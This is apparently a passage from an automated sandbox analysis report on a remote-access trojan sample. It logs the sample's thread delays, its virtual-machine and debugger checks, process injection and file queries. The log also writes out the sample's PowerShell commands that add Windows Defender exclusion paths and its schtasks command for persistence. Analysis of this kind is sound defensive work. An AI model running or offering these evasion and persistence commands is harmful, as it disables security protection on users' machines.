                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597500
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597387
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597281
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597172
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 597062
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596952
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596843
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596734
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596625
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596515
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596406
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596297
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596187
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 596078
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595969
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595859
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595750
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595640
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595531
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595422
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595312
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595203
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 595094
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594984
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594875
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594765
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594656
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594547
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594437
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594328
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594219
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594109
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeThread delayed: delay time: 594000
                Source: Amcache.hve.19.drBinary or memory string: VMware
                Source: Amcache.hve.19.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.19.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.19.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.19.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.19.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.19.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.19.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.19.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.19.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.19.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: zDAKFK.exe, 00000010.00000002.4131158474.0000000000AC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Amcache.hve.19.drBinary or memory string: vmci.sys
                Source: Amcache.hve.19.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.19.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.19.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.19.drBinary or memory string: VMware20,1
                Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.19.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.19.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.19.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.19.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.19.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.19.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.19.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.19.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Amcache.hve.19.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeCode function: 16_2_00D9EC85 LdrInitializeThunk,16_2_00D9EC85
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zDAKFK.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zDAKFK.exe"Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeMemory written: C:\Users\user\AppData\Roaming\zDAKFK.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zDAKFK.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpCFF6.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\zDAKFK.exeProcess created: C:\Users\user\AppData\Roaming\zDAKFK.exe "C:\Users\user\AppData\Roaming\zDAKFK.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
